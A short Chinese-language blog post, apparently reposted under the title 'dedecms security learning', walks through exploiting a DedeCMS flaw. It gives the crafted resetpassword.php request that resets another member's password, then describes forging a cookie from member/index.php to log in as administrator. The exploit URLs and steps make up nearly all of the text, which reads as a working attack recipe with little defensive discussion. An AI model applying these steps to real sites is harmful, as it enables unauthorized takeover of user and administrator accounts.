最近看到一个问题,还挺严重的,便测试了一下,果然不安全啊…..
步骤如下:
先注册一个帐号,0000001或者1aaa等等都行
2.首先要确认该帐号通过审核了,然后访问:
http://www.dede.com/member/resetpassword.php?dopost=safequestion&safequestion=0.0&id=9
3.然后查看请求结果打开那个url修改密码,修改好了之后,算了修改了前台的密码了
4如果想要获得admin的后台密码的话,还需要进行伪造cookie
首先访问:http://www.dede.com/member/index.php?uid=0000001
获取到相关的cookiemd5,然后直接登录就好了
找目录在这里
转载请注明:稻香的博客 » dedecms安全学习